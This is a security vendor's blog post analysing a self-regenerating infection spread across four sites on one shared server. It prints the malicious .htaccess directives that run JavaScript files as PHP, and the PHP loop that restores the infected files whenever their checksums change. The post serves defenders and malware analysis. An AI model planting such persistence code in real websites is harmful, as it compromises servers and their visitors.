Website Malware – Reality of Cross-Site Contaminations

Website Malware Cross Contamination

Sometimes you can’t help but put yourself in the shoes of your clients and skeptics and wonder how many times they roll their eyes at the things you say. Cross-site contamination is one of those things.

We first start writing about it in March of 2013 in a little post that got a lot of attention, “A Little Tale About Website Cross Contamination”. In that case, we talked to how the attack vector was coming from a neighboring site that had since been neglected; in turn it was now housing the generating payload that was affecting the live sites. All in all, it was a sad and depressing story.

In this case, it’s unique in that it would fall into what we would categorize as a targeted attack. That’s right, the complete opposite of what we often tell most readers they fall into, opportunistic attacks. I will caveat that it’s not known for sure, but after reading this we’ll let you be the judge.

/* It’s nothing personal, it’s just business */

The Scenario

As is in most cases, a client came through our virtual doors a bit perplexed and flustered. They were suffering a continuous infection problem. No matter what they did, the same four sites kept being affected. The environment was riddled with other sites, further complicating the case especially if you know how we’re configured. It also so happened that every time we cleared one site, within minutes it’d come right back, almost as if it were laughing at us. Do you realize how annoying that is?

Often in a scenario like this, it would mean there was another payload that was doing the generation, something we were missing. We have even seen it where it’s tied into the system’s cron jobs and run at set intervals making it even more excruciating a problem to debug without server root access. Needless to say, none of that was the problem. We were staring at the problem the entire time.

This is what it was doing at a high level:

Sucuri - Cross-Site Contamination

Of the various other sites on the server, it picked four sites and became a self-licking ice cream cone for lack of a better term. What we quickly realized was that you couldn’t just remove one, you had to remove all four at the same exact time. The generation cycle was so fast that by the time we cleared one, the other would be back within seconds.

The Details

So how was it doing this? We dug a little deeper into the payload to better understand, and this is what we found.

The crux of the payload had two parts:

  1. .htaccess
  2. a Javascript File

The .htaccess was used to load the payload onto the browser, but the real work horse was the JavaScript file loading.

This is what the .htaccess contained:

<files ~ ".js$">
SetHandler application/x-httpd-php
php_value auto_append_file /path-to-file/js/jquery-mini.js
php_flag display_errors Off
</files>

If you’re not familiar with the directives being used, don’t worry, it’s pretty straight forward.

The <files ~ “.js$”> is defining the file type – in this case JavaScript. Then it’s saying to handle the JS as PHP. That’s what it is doing here: SetHandler application/x-httpd-php. Then it’s actually appending the payload, which is in a JavaScript here php_value auto_append_file /path-to-file/js/jquery-mini.js. And, just in case there are some warnings brought about by the server configuration, it’s saying go ahead and turn that off so that no one knows here that the php_flag display_errors Off.

This isn’t even the fun part yet. The real fun begins in the JavaScript file. This is what it looked like:

Sucuri - Cross-Site Contamination - JavaScript

The first red flag was the use of the opening PHP tags – <?php. It’s a warning because that doesn’t belong in a JS file, but if you recall the .htaccess file, it makes sense. It needs the tags as it’s being executed as PHP. Using our free decoder you’re able to quickly break down the payload to see what’s going on:

Sucuri Cross-Site Contamination - JS

I truncated it to handle two sites or I’d never get the image into the frame. A couple of areas to pay attention to are the first two arrays:

 array(
      'name'=>'/path-site-1/.htaccess',
      'checksum'=>'4235295951',
      'data'=>'7068705f76616c756.....,
      'jser'=>'/path-site-1/js/jquery-mini.js'
     ),
 array(
      'name'=>'/path-site-2/.htaccess',
      'checksum'=>'3083167236',
      'data'=>'3c66696c6573207e20....,
      'jser'=>'/path-site-2/js/jquery-mini.js'
    ),

The arrays by themselves aren’t doing anything, at least not until you get here:

foreach ($check as $row)
 {
	chmod($row['jser'],0775);
	chmod($row['name'],0660);
	if (crc32(@file_get_contents($row['name']))<>$row['checksum']) echo @file_put_contents($row['name'],hex2bin($row['data']));
	if (crc32(@file_get_contents($___jser['selfname']))<>crc32(@file_get_contents($row['jser']))) @file_put_contents($row['jser'],@file_get_contents($___jser['selfname']));
 }

This is where it is doing the check. It’s asking, does the .htaccess exist? It does so by checking for the ‘name’ array option; then verifies it by checking its hash against the ‘checksum’ array. If it exists, it’s ignored, but if it doesn’t, then it uses the content in the ‘data’ array option in the place of what currently exists. Using the method of comparing hashes is a very quick and effective method to check if anything has changed – just a little tip.

It then does the same thing for the ‘jser’ array. That one giant, self-licking ice cream cone. What was really interesting is that the paths were actually hard-coded in the files here:

 'name'=>'/path-site-1/.htaccess',
 'jser'=>'/path-site-1/js/jquery-mini.js'

I obviously replaced the path directory, but this leads us to believe this was a highly coveted targeted attack. Not because we wish them on anyone, but because they are always fun to analyze.

Now, imagine that same process across all four sites. They each contained the same payload and the only way to remove it was to delete them all at the same time. Again, deleting one would only generate the next pair.

The Payload

Let’s not forget that after all that, the real intent was to drop a payload on the visitor’s browser. The target being four distinct websites. At the very bottom of the JavaScript file you find its real intent:

if(!function_exists('hex2bin'))
 {
	function hex2bin($h)
	 {
		if (!is_string($h)) return null;
		$r='';
		for ($a=0;$a<strlen($h);$a+=2) $r.=chr(hexdec($h{$a}.$h{($a+1)}));
		return $r;
	 }
 }

It’s looking for the hex2bin function which is here:

Sucuri Cross Site Contamination hex2bin Function

When you go to decode it you get this after the first level of obfuscation. This one you’ll need to do a little leg work on:

Sucuri Cross-Site Contamination

And after one more layer of decoding you finally get to the intended payload:

Sucuri Cross-Site Contamination

To help decipher through it, this is what really matters from that image:

Sucuri Cross-Site Contamination

If you’re curious what it’s doing then you might be interested in my last post about SEP Attacks and Link Farms. Same exact thing.

Full Circle

In the past we focused on the impacts of cross-site contamination as they pertain to attack vectors, but what we hadn’t discussed was how more sophisticated attacks can be wired together in a scenario like the one described here.

It was actually ingenious and very simple to implement. The challenge however was that although simple to implement, it was difficult to detect. There were no other components that would have flagged it. To the average user this would have been an exhausting process. The fastest method to finding the different payloads would be to reverse engineer the payloads until you go to the first layer that very clearly outlined the path and files. You’d then have to remove each one at the same time, which is best done using the command line interface via a tool like NCFTP or shell.

4 comments
  1. woops typo up there :We first start writing about it in March of 2013 in a little post that got a lot of attention:
    wrong year – great article!

Comments are closed.

You May Also Like